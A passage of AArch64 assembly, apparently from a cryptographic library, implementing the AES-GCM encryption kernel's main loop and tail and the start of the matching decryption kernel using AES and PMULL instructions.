aesmc v0.16b, v0.16b // AES block 4k+4 - round 8
aese v2.16b, v23.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 5
aese v1.16b, v24.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 6
eor v10.16b, v10.16b, v4.16b // GHASH block 4k+1 - mid
pmull2 v4.1q, v6.2d, v13.2d // GHASH block 4k+2 - high
pmull v5.1q, v6.1d, v13.1d // GHASH block 4k+2 - low
aese v1.16b, v25.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 7
pmull v6.1q, v7.1d, v12.1d // GHASH block 4k+3 - low
eor v9.16b, v9.16b, v4.16b // GHASH block 4k+2 - high
aese v3.16b, v24.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 6
ldp x19, x20, [x0, #16] // AES block 4k+5 - load plaintext
aese v1.16b, v26.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 8
mov d4, v7.d[1] // GHASH block 4k+3 - mid
aese v2.16b, v24.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 6
eor v11.16b, v11.16b, v5.16b // GHASH block 4k+2 - low
pmull2 v8.1q, v8.2d, v16.2d // GHASH block 4k+2 - mid
pmull2 v5.1q, v7.2d, v12.2d // GHASH block 4k+3 - high
eor v4.8b, v4.8b, v7.8b // GHASH block 4k+3 - mid
aese v2.16b, v25.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 7
eor x19, x19, x13 // AES block 4k+5 - round N low
aese v2.16b, v26.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 8
eor v10.16b, v10.16b, v8.16b // GHASH block 4k+2 - mid
aese v3.16b, v25.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 7
eor x21, x21, x13 // AES block 4k+6 - round N low
aese v3.16b, v26.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 8
movi v8.8b, #0xc2
pmull v4.1q, v4.1d, v16.1d // GHASH block 4k+3 - mid
eor v9.16b, v9.16b, v5.16b // GHASH block 4k+3 - high
cmp x17, #12 // setup flags for AES-128/192/256 check
fmov d5, x19 // AES block 4k+5 - mov low
ldp x6, x7, [x0, #0] // AES block 4k+4 - load plaintext
b.lt Lenc_main_loop_continue // branch if AES-128
aese v1.16b, v27.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 9
aese v0.16b, v27.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 9
aese v2.16b, v27.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 9
aese v3.16b, v27.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 9
aese v0.16b, v28.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 10
aese v1.16b, v28.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 10
aese v2.16b, v28.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 10
aese v3.16b, v28.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 10
b.eq Lenc_main_loop_continue // branch if AES-192
aese v0.16b, v29.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 11
aese v1.16b, v29.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 11
aese v2.16b, v29.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 11
aese v3.16b, v29.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 11
aese v1.16b, v30.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 12
aese v0.16b, v30.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 12
aese v2.16b, v30.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 12
aese v3.16b, v30.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 12
Lenc_main_loop_continue:
shl d8, d8, #56 // mod_constant
eor v11.16b, v11.16b, v6.16b // GHASH block 4k+3 - low
eor v10.16b, v10.16b, v4.16b // GHASH block 4k+3 - mid
add w12, w12, #1 // CTR block 4k+3
eor v4.16b, v11.16b, v9.16b // MODULO - karatsuba tidy up
add x0, x0, #64 // AES input_ptr update
pmull v7.1q, v9.1d, v8.1d // MODULO - top 64b align with mid
rev w9, w12 // CTR block 4k+8
ext v9.16b, v9.16b, v9.16b, #8 // MODULO - other top alignment
eor x6, x6, x13 // AES block 4k+4 - round N low
eor v10.16b, v10.16b, v4.16b // MODULO - karatsuba tidy up
eor x7, x7, x14 // AES block 4k+4 - round N high
fmov d4, x6 // AES block 4k+4 - mov low
orr x9, x11, x9, lsl #32 // CTR block 4k+8
eor v7.16b, v9.16b, v7.16b // MODULO - fold into mid
eor x20, x20, x14 // AES block 4k+5 - round N high
eor x24, x24, x14 // AES block 4k+7 - round N high
add w12, w12, #1 // CTR block 4k+8
aese v0.16b, v31.16b // AES block 4k+4 - round N-1
fmov v4.d[1], x7 // AES block 4k+4 - mov high
eor v10.16b, v10.16b, v7.16b // MODULO - fold into mid
fmov d7, x23 // AES block 4k+7 - mov low
aese v1.16b, v31.16b // AES block 4k+5 - round N-1
fmov v5.d[1], x20 // AES block 4k+5 - mov high
fmov d6, x21 // AES block 4k+6 - mov low
cmp x0, x5 // LOOP CONTROL
fmov v6.d[1], x22 // AES block 4k+6 - mov high
pmull v9.1q, v10.1d, v8.1d // MODULO - mid 64b align with low
eor v4.16b, v4.16b, v0.16b // AES block 4k+4 - result
fmov d0, x10 // CTR block 4k+8
fmov v0.d[1], x9 // CTR block 4k+8
rev w9, w12 // CTR block 4k+9
add w12, w12, #1 // CTR block 4k+9
eor v5.16b, v5.16b, v1.16b // AES block 4k+5 - result
fmov d1, x10 // CTR block 4k+9
orr x9, x11, x9, lsl #32 // CTR block 4k+9
fmov v1.d[1], x9 // CTR block 4k+9
aese v2.16b, v31.16b // AES block 4k+6 - round N-1
rev w9, w12 // CTR block 4k+10
st1 { v4.16b}, [x2], #16 // AES block 4k+4 - store result
orr x9, x11, x9, lsl #32 // CTR block 4k+10
eor v11.16b, v11.16b, v9.16b // MODULO - fold into low
fmov v7.d[1], x24 // AES block 4k+7 - mov high
ext v10.16b, v10.16b, v10.16b, #8 // MODULO - other mid alignment
st1 { v5.16b}, [x2], #16 // AES block 4k+5 - store result
add w12, w12, #1 // CTR block 4k+10
aese v3.16b, v31.16b // AES block 4k+7 - round N-1
eor v6.16b, v6.16b, v2.16b // AES block 4k+6 - result
fmov d2, x10 // CTR block 4k+10
st1 { v6.16b}, [x2], #16 // AES block 4k+6 - store result
fmov v2.d[1], x9 // CTR block 4k+10
rev w9, w12 // CTR block 4k+11
eor v11.16b, v11.16b, v10.16b // MODULO - fold into low
orr x9, x11, x9, lsl #32 // CTR block 4k+11
eor v7.16b, v7.16b, v3.16b // AES block 4k+7 - result
st1 { v7.16b}, [x2], #16 // AES block 4k+7 - store result
b.lt Lenc_main_loop
Lenc_prepretail: // PREPRETAIL
aese v1.16b, v18.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 0
rev64 v6.16b, v6.16b // GHASH block 4k+2 (t0, t1, and t2 free)
aese v2.16b, v18.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 0
fmov d3, x10 // CTR block 4k+3
aese v0.16b, v18.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 0
rev64 v4.16b, v4.16b // GHASH block 4k (only t0 is free)
fmov v3.d[1], x9 // CTR block 4k+3
ext v11.16b, v11.16b, v11.16b, #8 // PRE 0
aese v2.16b, v19.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 1
aese v0.16b, v19.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 1
eor v4.16b, v4.16b, v11.16b // PRE 1
rev64 v5.16b, v5.16b // GHASH block 4k+1 (t0 and t1 free)
aese v2.16b, v20.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 2
aese v3.16b, v18.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 0
mov d10, v17.d[1] // GHASH block 4k - mid
aese v1.16b, v19.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 1
pmull v11.1q, v4.1d, v15.1d // GHASH block 4k - low
mov d8, v4.d[1] // GHASH block 4k - mid
pmull2 v9.1q, v4.2d, v15.2d // GHASH block 4k - high
aese v2.16b, v21.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 3
aese v1.16b, v20.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 2
eor v8.8b, v8.8b, v4.8b // GHASH block 4k - mid
aese v0.16b, v20.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 2
aese v3.16b, v19.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 1
aese v1.16b, v21.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 3
pmull v10.1q, v8.1d, v10.1d // GHASH block 4k - mid
pmull2 v4.1q, v5.2d, v14.2d // GHASH block 4k+1 - high
pmull v8.1q, v5.1d, v14.1d // GHASH block 4k+1 - low
aese v3.16b, v20.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 2
eor v9.16b, v9.16b, v4.16b // GHASH block 4k+1 - high
mov d4, v5.d[1] // GHASH block 4k+1 - mid
aese v0.16b, v21.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 3
eor v11.16b, v11.16b, v8.16b // GHASH block 4k+1 - low
aese v3.16b, v21.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 3
eor v4.8b, v4.8b, v5.8b // GHASH block 4k+1 - mid
mov d8, v6.d[1] // GHASH block 4k+2 - mid
aese v0.16b, v22.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 4
rev64 v7.16b, v7.16b // GHASH block 4k+3 (t0, t1, t2 and t3 free)
aese v3.16b, v22.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 4
pmull v4.1q, v4.1d, v17.1d // GHASH block 4k+1 - mid
eor v8.8b, v8.8b, v6.8b // GHASH block 4k+2 - mid
add w12, w12, #1 // CTR block 4k+3
pmull v5.1q, v6.1d, v13.1d // GHASH block 4k+2 - low
aese v3.16b, v23.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 5
aese v2.16b, v22.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 4
eor v10.16b, v10.16b, v4.16b // GHASH block 4k+1 - mid
pmull2 v4.1q, v6.2d, v13.2d // GHASH block 4k+2 - high
eor v11.16b, v11.16b, v5.16b // GHASH block 4k+2 - low
ins v8.d[1], v8.d[0] // GHASH block 4k+2 - mid
aese v2.16b, v23.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 5
eor v9.16b, v9.16b, v4.16b // GHASH block 4k+2 - high
mov d4, v7.d[1] // GHASH block 4k+3 - mid
aese v1.16b, v22.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 4
pmull2 v8.1q, v8.2d, v16.2d // GHASH block 4k+2 - mid
eor v4.8b, v4.8b, v7.8b // GHASH block 4k+3 - mid
pmull2 v5.1q, v7.2d, v12.2d // GHASH block 4k+3 - high
aese v1.16b, v23.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 5
pmull v4.1q, v4.1d, v16.1d // GHASH block 4k+3 - mid
eor v10.16b, v10.16b, v8.16b // GHASH block 4k+2 - mid
aese v0.16b, v23.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 5
aese v1.16b, v24.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 6
aese v2.16b, v24.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 6
aese v0.16b, v24.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 6
movi v8.8b, #0xc2
aese v3.16b, v24.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 6
aese v1.16b, v25.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 7
eor v9.16b, v9.16b, v5.16b // GHASH block 4k+3 - high
aese v0.16b, v25.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 7
aese v3.16b, v25.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 7
shl d8, d8, #56 // mod_constant
aese v1.16b, v26.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 8
eor v10.16b, v10.16b, v4.16b // GHASH block 4k+3 - mid
pmull v6.1q, v7.1d, v12.1d // GHASH block 4k+3 - low
aese v3.16b, v26.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 8
cmp x17, #12 // setup flags for AES-128/192/256 check
aese v0.16b, v26.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 8
eor v11.16b, v11.16b, v6.16b // GHASH block 4k+3 - low
aese v2.16b, v25.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 7
eor v10.16b, v10.16b, v9.16b // karatsuba tidy up
aese v2.16b, v26.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 8
pmull v4.1q, v9.1d, v8.1d
ext v9.16b, v9.16b, v9.16b, #8
eor v10.16b, v10.16b, v11.16b
b.lt Lenc_finish_prepretail // branch if AES-128
aese v1.16b, v27.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 9
aese v3.16b, v27.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 9
aese v0.16b, v27.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 9
aese v2.16b, v27.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 9
aese v3.16b, v28.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 10
aese v1.16b, v28.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 10
aese v0.16b, v28.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 10
aese v2.16b, v28.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 10
b.eq Lenc_finish_prepretail // branch if AES-192
aese v1.16b, v29.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 11
aese v0.16b, v29.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 11
aese v3.16b, v29.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 11
aese v2.16b, v29.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 11
aese v1.16b, v30.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 12
aese v0.16b, v30.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 12
aese v3.16b, v30.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 12
aese v2.16b, v30.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 12
Lenc_finish_prepretail:
eor v10.16b, v10.16b, v4.16b
eor v10.16b, v10.16b, v9.16b
pmull v4.1q, v10.1d, v8.1d
ext v10.16b, v10.16b, v10.16b, #8
aese v1.16b, v31.16b // AES block 4k+5 - round N-1
eor v11.16b, v11.16b, v4.16b
aese v3.16b, v31.16b // AES block 4k+7 - round N-1
aese v0.16b, v31.16b // AES block 4k+4 - round N-1
aese v2.16b, v31.16b // AES block 4k+6 - round N-1
eor v11.16b, v11.16b, v10.16b
Lenc_tail: // TAIL
ext v8.16b, v11.16b, v11.16b, #8 // prepare final partial tag
sub x5, x4, x0 // main_end_input_ptr is number of bytes left to process
ldp x6, x7, [x0], #16 // AES block 4k+4 - load plaintext
eor x6, x6, x13 // AES block 4k+4 - round N low
eor x7, x7, x14 // AES block 4k+4 - round N high
cmp x5, #48
fmov d4, x6 // AES block 4k+4 - mov low
fmov v4.d[1], x7 // AES block 4k+4 - mov high
eor v5.16b, v4.16b, v0.16b // AES block 4k+4 - result
b.gt Lenc_blocks_more_than_3
cmp x5, #32
mov v3.16b, v2.16b
movi v11.8b, #0
movi v9.8b, #0
sub w12, w12, #1
mov v2.16b, v1.16b
movi v10.8b, #0
b.gt Lenc_blocks_more_than_2
mov v3.16b, v1.16b
sub w12, w12, #1
cmp x5, #16
b.gt Lenc_blocks_more_than_1
sub w12, w12, #1
b Lenc_blocks_less_than_1
Lenc_blocks_more_than_3: // blocks left > 3
st1 { v5.16b}, [x2], #16 // AES final-3 block - store result
ldp x6, x7, [x0], #16 // AES final-2 block - load input low & high
rev64 v4.16b, v5.16b // GHASH final-3 block
eor x6, x6, x13 // AES final-2 block - round N low
eor v4.16b, v4.16b, v8.16b // feed in partial tag
eor x7, x7, x14 // AES final-2 block - round N high
mov d22, v4.d[1] // GHASH final-3 block - mid
fmov d5, x6 // AES final-2 block - mov low
fmov v5.d[1], x7 // AES final-2 block - mov high
eor v22.8b, v22.8b, v4.8b // GHASH final-3 block - mid
movi v8.8b, #0 // suppress further partial tag feed in
mov d10, v17.d[1] // GHASH final-3 block - mid
pmull v11.1q, v4.1d, v15.1d // GHASH final-3 block - low
pmull2 v9.1q, v4.2d, v15.2d // GHASH final-3 block - high
pmull v10.1q, v22.1d, v10.1d // GHASH final-3 block - mid
eor v5.16b, v5.16b, v1.16b // AES final-2 block - result
Lenc_blocks_more_than_2: // blocks left > 2
st1 { v5.16b}, [x2], #16 // AES final-2 block - store result
ldp x6, x7, [x0], #16 // AES final-1 block - load input low & high
rev64 v4.16b, v5.16b // GHASH final-2 block
eor x6, x6, x13 // AES final-1 block - round N low
eor v4.16b, v4.16b, v8.16b // feed in partial tag
fmov d5, x6 // AES final-1 block - mov low
eor x7, x7, x14 // AES final-1 block - round N high
fmov v5.d[1], x7 // AES final-1 block - mov high
movi v8.8b, #0 // suppress further partial tag feed in
pmull2 v20.1q, v4.2d, v14.2d // GHASH final-2 block - high
mov d22, v4.d[1] // GHASH final-2 block - mid
pmull v21.1q, v4.1d, v14.1d // GHASH final-2 block - low
eor v22.8b, v22.8b, v4.8b // GHASH final-2 block - mid
eor v5.16b, v5.16b, v2.16b // AES final-1 block - result
eor v9.16b, v9.16b, v20.16b // GHASH final-2 block - high
pmull v22.1q, v22.1d, v17.1d // GHASH final-2 block - mid
eor v11.16b, v11.16b, v21.16b // GHASH final-2 block - low
eor v10.16b, v10.16b, v22.16b // GHASH final-2 block - mid
Lenc_blocks_more_than_1: // blocks left > 1
st1 { v5.16b}, [x2], #16 // AES final-1 block - store result
rev64 v4.16b, v5.16b // GHASH final-1 block
ldp x6, x7, [x0], #16 // AES final block - load input low & high
eor v4.16b, v4.16b, v8.16b // feed in partial tag
movi v8.8b, #0 // suppress further partial tag feed in
eor x6, x6, x13 // AES final block - round N low
mov d22, v4.d[1] // GHASH final-1 block - mid
pmull2 v20.1q, v4.2d, v13.2d // GHASH final-1 block - high
eor x7, x7, x14 // AES final block - round N high
eor v22.8b, v22.8b, v4.8b // GHASH final-1 block - mid
eor v9.16b, v9.16b, v20.16b // GHASH final-1 block - high
ins v22.d[1], v22.d[0] // GHASH final-1 block - mid
fmov d5, x6 // AES final block - mov low
fmov v5.d[1], x7 // AES final block - mov high
pmull2 v22.1q, v22.2d, v16.2d // GHASH final-1 block - mid
pmull v21.1q, v4.1d, v13.1d // GHASH final-1 block - low
eor v5.16b, v5.16b, v3.16b // AES final block - result
eor v10.16b, v10.16b, v22.16b // GHASH final-1 block - mid
eor v11.16b, v11.16b, v21.16b // GHASH final-1 block - low
Lenc_blocks_less_than_1: // blocks left <= 1
and x1, x1, #127 // bit_length %= 128
mvn x13, xzr // rkN_l = 0xffffffffffffffff
sub x1, x1, #128 // bit_length -= 128
neg x1, x1 // bit_length = 128 - #bits in input (in range [1,128])
ld1 { v18.16b}, [x2] // load existing bytes where the possibly partial last block is to be stored
mvn x14, xzr // rkN_h = 0xffffffffffffffff
and x1, x1, #127 // bit_length %= 128
lsr x14, x14, x1 // rkN_h is mask for top 64b of last block
cmp x1, #64
csel x6, x13, x14, lt
csel x7, x14, xzr, lt
fmov d0, x6 // ctr0b is mask for last block
fmov v0.d[1], x7
and v5.16b, v5.16b, v0.16b // possibly partial last block has zeroes in highest bits
rev64 v4.16b, v5.16b // GHASH final block
eor v4.16b, v4.16b, v8.16b // feed in partial tag
bif v5.16b, v18.16b, v0.16b // insert existing bytes in top end of result before storing
pmull2 v20.1q, v4.2d, v12.2d // GHASH final block - high
mov d8, v4.d[1] // GHASH final block - mid
rev w9, w12
pmull v21.1q, v4.1d, v12.1d // GHASH final block - low
eor v9.16b, v9.16b, v20.16b // GHASH final block - high
eor v8.8b, v8.8b, v4.8b // GHASH final block - mid
pmull v8.1q, v8.1d, v16.1d // GHASH final block - mid
eor v11.16b, v11.16b, v21.16b // GHASH final block - low
eor v10.16b, v10.16b, v8.16b // GHASH final block - mid
movi v8.8b, #0xc2
eor v4.16b, v11.16b, v9.16b // MODULO - karatsuba tidy up
shl d8, d8, #56 // mod_constant
eor v10.16b, v10.16b, v4.16b // MODULO - karatsuba tidy up
pmull v7.1q, v9.1d, v8.1d // MODULO - top 64b align with mid
ext v9.16b, v9.16b, v9.16b, #8 // MODULO - other top alignment
eor v10.16b, v10.16b, v7.16b // MODULO - fold into mid
eor v10.16b, v10.16b, v9.16b // MODULO - fold into mid
pmull v9.1q, v10.1d, v8.1d // MODULO - mid 64b align with low
ext v10.16b, v10.16b, v10.16b, #8 // MODULO - other mid alignment
str w9, [x16, #12] // store the updated counter
st1 { v5.16b}, [x2] // store all 16B
eor v11.16b, v11.16b, v9.16b // MODULO - fold into low
eor v11.16b, v11.16b, v10.16b // MODULO - fold into low
ext v11.16b, v11.16b, v11.16b, #8
rev64 v11.16b, v11.16b
mov x0, x15
st1 { v11.16b }, [x3]
ldp x19, x20, [sp, #16]
ldp x21, x22, [sp, #32]
ldp x23, x24, [sp, #48]
ldp d8, d9, [sp, #64]
ldp d10, d11, [sp, #80]
ldp d12, d13, [sp, #96]
ldp d14, d15, [sp, #112]
ldp x29, x30, [sp], #128
AARCH64_VALIDATE_LINK_REGISTER
ret
.globl _aes_gcm_dec_kernel
.private_extern _aes_gcm_dec_kernel
.align 4
_aes_gcm_dec_kernel:
AARCH64_SIGN_LINK_REGISTER
stp x29, x30, [sp, #-128]!
mov x29, sp
stp x19, x20, [sp, #16]
mov x16, x4
mov x8, x5
stp x21, x22, [sp, #32]
stp x23, x24, [sp, #48]
stp d8, d9, [sp, #64]
stp d10, d11, [sp, #80]
stp d12, d13, [sp, #96]
stp d14, d15, [sp, #112]
ldr w17, [x8, #240]
add x19, x8, x17, lsl #4 // borrow input_l1 for last key
ldp x13, x14, [x19] // load round N keys
ldr q31, [x19, #-16] // load round N-1 keys
lsr x5, x1, #3 // byte_len
mov x15, x5
ldp x10, x11, [x16] // ctr96_b64, ctr96_t32
ldr q26, [x8, #128] // load rk8
sub x5, x5, #1 // byte_len - 1
ldr q25, [x8, #112] // load rk7
and x5, x5, #0xffffffffffffffc0 // number of bytes to be processed in main loop (at least 1 byte must be handled by tail)
add x4, x0, x1, lsr #3 // end_input_ptr
ldr q24, [x8, #96] // load rk6
lsr x12, x11, #32
ldr q23, [x8, #80] // load rk5
orr w11, w11, w11
ldr q21, [x8, #48] // load rk3
add x5, x5, x0
rev w12, w12 // rev_ctr32
add w12, w12, #1 // increment rev_ctr32
fmov d3, x10 // CTR block 3
rev w9, w12 // CTR block 1
add w12, w12, #1 // CTR block 1
fmov d1, x10 // CTR block 1
orr x9, x11, x9, lsl #32 // CTR block 1
ld1 { v0.16b}, [x16] // special case vector load initial counter so we can start first AES block as quickly as possible
fmov v1.d[1], x9 // CTR block 1
rev w9, w12 // CTR block 2
add w12, w12, #1 // CTR block 2
fmov d2, x10 // CTR block 2
orr x9, x11, x9, lsl #32 // CTR block 2
fmov v2.d[1], x9 // CTR block 2
rev w9, w12 // CTR block 3
orr x9, x11, x9, lsl #32 // CTR block 3
ldr q18, [x8, #0] // load rk0
fmov v3.d[1], x9 // CTR block 3
add w12, w12, #1 // CTR block 3
ldr q22, [x8, #64] // load rk4
ldr q19, [x8, #16] // load rk1
aese v0.16b, v18.16b
aesmc v0.16b, v0.16b // AES block 0 - round 0
ldr q14, [x6, #48] // load h3l | h3h
ext v14.16b, v14.16b, v14.16b, #8
aese v3.16b, v18.16b
aesmc v3.16b, v3.16b // AES block 3 - round 0
ldr q15, [x6, #80] // load h4l | h4h
ext v15.16b, v15.16b, v15.16b, #8
aese v1.16b, v18.16b
aesmc v1.16b, v1.16b // AES block 1 - round 0
ldr q13, [x6, #32] // load h2l | h2h
ext v13.16b, v13.16b, v13.16b, #8
aese v2.16b, v18.16b
aesmc v2.16b, v2.16b // AES block 2 - round 0
ldr q20, [x8, #32] // load rk2
aese v0.16b, v19.16b
aesmc v0.16b, v0.16b // AES block 0 - round 1
aese v1.16b, v19.16b
aesmc v1.16b, v1.16b // AES block 1 - round 1
ld1 { v11.16b}, [x3]
ext v11.16b, v11.16b, v11.16b, #8
rev64 v11.16b, v11.16b
aese v2.16b, v19.16b
aesmc v2.16b, v2.16b // AES block 2 - round 1
ldr q27, [x8, #144] // load rk9
aese v3.16b, v19.16b
aesmc v3.16b, v3.16b // AES block 3 - round 1
ldr q30, [x8, #192] // load rk12
aese v0.16b, v20.16b
aesmc v0.16b, v0.16b // AES block 0 - round 2
ldr q12, [x6] // load h1l | h1h
ext v12.16b, v12.16b, v12.16b, #8
aese v2.16b, v20.16b
aesmc v2.16b, v2.16b // AES block 2 - round 2
ldr q28, [x8, #160] // load rk10
aese v3.16b, v20.16b
aesmc v3.16b, v3.16b // AES block 3 - round 2
aese v0.16b, v21.16b
aesmc v0.16b, v0.16b // AES block 0 - round 3
aese v1.16b, v20.16b
aesmc v1.16b, v1.16b // AES block 1 - round 2
aese v3.16b, v21.16b
aesmc v3.16b, v3.16b // AES block 3 - round 3
aese v0.16b, v22.16b
aesmc v0.16b, v0.16b // AES block 0 - round 4
aese v2.16b, v21.16b
aesmc v2.16b, v2.16b // AES block 2 - round 3
aese v1.16b, v21.16b
aesmc v1.16b, v1.16b // AES block 1 - round 3
aese v3.16b, v22.16b
aesmc v3.16b, v3.16b // AES block 3 - round 4
aese v2.16b, v22.16b
aesmc v2.16b, v2.16b // AES block 2 - round 4
aese v1.16b, v22.16b
aesmc v1.16b, v1.16b // AES block 1 - round 4
aese v3.16b, v23.16b
aesmc v3.16b, v3.16b // AES block 3 - round 5
aese v0.16b, v23.16b
aesmc v0.16b, v0.16b // AES block 0 - round 5
aese v1.16b, v23.16b
aesmc v1.16b, v1.16b // AES block 1 - round 5
aese v2.16b, v23.16b
aesmc v2.16b, v2.16b // AES block 2 - round 5
aese v0.16b, v24.16b
aesmc v0.16b, v0.16b // AES block 0 - round 6
aese v3.16b, v24.16b
aesmc v3.16b, v3.16b // AES block 3 - round 6
cmp x17, #12 // setup flags for AES-128/192/256 check
aese v1.16b, v24.16b
aesmc v1.16b, v1.16b // AES block 1 - round 6
aese v2.16b, v24.16b
aesmc v2.16b, v2.16b // AES block 2 - round 6
aese v0.16b, v25.16b
aesmc v0.16b, v0.16b // AES block 0 - round 7
aese v1.16b, v25.16b
aesmc v1.16b, v1.16b // AES block 1 - round 7
aese v3.16b, v25.16b
aesmc v3.16b, v3.16b // AES block 3 - round 7
aese v0.16b, v26.16b
aesmc v0.16b, v0.16b // AES block 0 - round 8
aese v2.16b, v25.16b
aesmc v2.16b, v2.16b // AES block 2 - round 7
aese v3.16b, v26.16b
aesmc v3.16b, v3.16b // AES block 3 - round 8
aese v1.16b, v26.16b
aesmc v1.16b, v1.16b // AES block 1 - round 8
ldr q29, [x8, #176] // load rk11
aese v2.16b, v26.16b
aesmc v2.16b, v2.16b // AES block 2 - round 8
b.lt Ldec_finish_first_blocks // branch if AES-128
aese v0.16b, v27.16b
aesmc v0.16b, v0.16b // AES block 0 - round 9
aese v1.16b, v27.16b
aesmc v1.16b, v1.16b // AES block 1 - round 9
aese v3.16b, v27.16b
aesmc v3.16b, v3.16b // AES block 3 - round 9
aese v2.16b, v27.16b
aesmc v2.16b, v2.16b // AES block 2 - round 9
aese v0.16b, v28.16b
aesmc v0.16b, v0.16b // AES block 0 - round 10
aese v1.16b, v28.16b
aesmc v1.16b, v1.16b // AES block 1 - round 10
aese v3.16b, v28.16b
aesmc v3.16b, v3.16b // AES block 3 - round 10
aese v2.16b, v28.16b
aesmc v2.16b, v2.16b // AES block 2 - round 10
b.eq Ldec_finish_first_blocks // branch if AES-192
aese v0.16b, v29.16b
aesmc v0.16b, v0.16b // AES block 0 - round 11
aese v3.16b, v29.16b
aesmc v3.16b, v3.16b // AES block 3 - round 11
aese v1.16b, v29.16b
aesmc v1.16b, v1.16b // AES block 1 - round 11
aese v2.16b, v29.16b
aesmc v2.16b, v2.16b // AES block 2 - round 11
aese v1.16b, v30.16b
aesmc v1.16b, v1.16b // AES block 1 - round 12
aese v0.16b, v30.16b
aesmc v0.16b, v0.16b // AES block 0 - round 12
aese v2.16b, v30.16b
aesmc v2.16b, v2.16b // AES block 2 - round 12
aese v3.16b, v30.16b
aesmc v3.16b, v3.16b // AES block 3 - round 12
Ldec_finish_first_blocks:
cmp x0, x5 // check if we have <= 4 blocks
trn1 v9.2d, v14.2d, v15.2d // h4h | h3h
trn2 v17.2d, v14.2d, v15.2d // h4l | h3l
trn1 v8.2d, v12.2d, v13.2d // h2h | h1h
trn2 v16.2d, v12.2d, v13.2d // h2l | h1l
eor v17.16b, v17.16b, v9.16b // h4k | h3k
aese v1.16b, v31.16b // AES block 1 - round N-1
aese v2.16b, v31.16b // AES block 2 - round N-1
eor v16.16b, v16.16b, v8.16b // h2k | h1k
aese v3.16b, v31.16b // AES block 3 - round N-1
aese v0.16b, v31.16b // AES block 0 - round N-1
b.ge Ldec_tail // handle tail
ldr q4, [x0, #0] // AES block 0 - load ciphertext
ldr q5, [x0, #16] // AES block 1 - load ciphertext
rev w9, w12 // CTR block 4
eor v0.16b, v4.16b, v0.16b // AES block 0 - result
eor v1.16b, v5.16b, v1.16b // AES block 1 - result
rev64 v5.16b, v5.16b // GHASH block 1
ldr q7, [x0, #48] // AES block 3 - load ciphertext
mov x7, v0.d[1] // AES block 0 - mov high
mov x6, v0.d[0] // AES block 0 - mov low
rev64 v4.16b, v4.16b // GHASH block 0
